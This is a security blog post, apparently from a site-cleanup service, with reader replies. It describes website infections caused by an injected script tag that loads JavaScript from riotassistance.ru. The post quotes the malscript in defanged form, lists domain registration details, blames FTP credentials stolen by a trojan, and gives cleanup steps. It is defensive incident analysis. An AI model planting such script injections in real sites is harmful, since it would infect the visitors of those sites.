riotassistance.ru infections
We’ve been seeing more website infections with a malscript that looks like:
(opening script tag) src="hxxp:// riotassistance.ru /Website.js">(closing script tag)
Note: We’ve also seen this same this but with nuttypiano replacing riotassistance.
Sometimes the last part: Website.js is something else:
Linux.js
Megabyte.js
and a few others. The common pattern here is obviously the riotassistance.ru domain and the last part of the URL has an upper-case first letter and is usually some random, but familiar word.
The other identifier is the seemingly useless string immediately following the malscript. In the example above it’s the:
Keep in mind that this will be different for each website, at least from what we’ve seen so far.
This malscript and it’s associated string has been found in index files and files that start with the word main, or in the footer.php file on WordPress sites. The footer.php that will be infected is usually in the theme folder for your site. So if you’re using the default theme, it will be the footer.php file in the theme/default folder on your site.
This same infection has been found in .js files as a document.write at the bottom of the .js file, such as this:
Time to dig a little deeper…
We find that this domain is registered:
domain: RIOTASSISTANCE.RU
nserver: ns1.getyourdns.com.
nserver: ns2.getyourdns.com.
nserver: ns3.getyourdns.com.
nserver: ns4.getyourdns.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 8482 735000
e-mail: angles@fastermail.ru
registrar: NAUNET-REG-RIPN
According to abuse.ch, this registrar has 126 sites that associated to Zeus:
We also find that the above listed email address is only registered on 4 other domains.
As far as cleaning this goes, obviously remove the malscript from your pages or replace the pages with known good backups.
From what we’ve found so far, this website infection happens via stolen FTP credentials. These FTP credentials are stolen by a virus/trojan on a PC that’s been used to FTP files to the infected website.
First, change all FTP passwords – immediately.
Second, run a full virus scan on all PCs used to FTP files to the infected website. This includes developers, authors, etc.
Third, if your site has been listed as suspicious by Google, request a review from the Google Webmaster Tools.
Post here if you have questions or send me an email if you’d like further help in cleaning this up.
Thank you.
Hi, we’ve been replacing our website with the clean codes and they’re still infected. what kind of FTP trojans tat i should be looking our for? I’ve just switched to FileZilla FTP, i used to upload using WinSCP. my PCs are all running Kaspersky updated. any suggestion to cleaning my website and detecting the source?
You’re running Kaspersky, but do you run full scans of your PCs? If not, please do. We find that people who aren’t running full scans at least once a day, will find infections that the anti-virus program didn’t block because it didn’t know about them when the PC was first infected.
So, without running a full scan, a virus or trojan can and will remain undetected for quite some time.
You might also switch to SFTP if your hosting provider supports it. This makes it more difficult to “sniff” the FTP traffic leaving your PCs.